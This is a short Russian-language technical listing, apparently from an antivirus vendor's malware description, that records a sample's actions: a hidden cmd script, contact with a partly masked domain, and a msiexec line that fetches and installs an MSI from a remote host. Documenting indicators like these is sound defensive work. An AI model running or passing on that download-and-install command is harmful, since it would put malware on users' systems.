Техническая информация
- '<SYSTEM32>\cmd.exe' /c f.cmd
- %HOMEPATH%\documents\f.cmd
- 'sy###use.best':443
- DNS ASK sy###use.best
- '<SYSTEM32>\cmd.exe' /c f.cmd' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /U/cstart msiexec /ihttps://syracuse.best/zx/v2.msi
- '<SYSTEM32>\msiexec.exe' /ihttps://syracuse.best/zx/v2.msi
- '<SYSTEM32>\ping.exe' www.bing.com
- '<SYSTEM32>\findstr.exe' /L "JnRol=0;" "%TEMP%\0a.dat"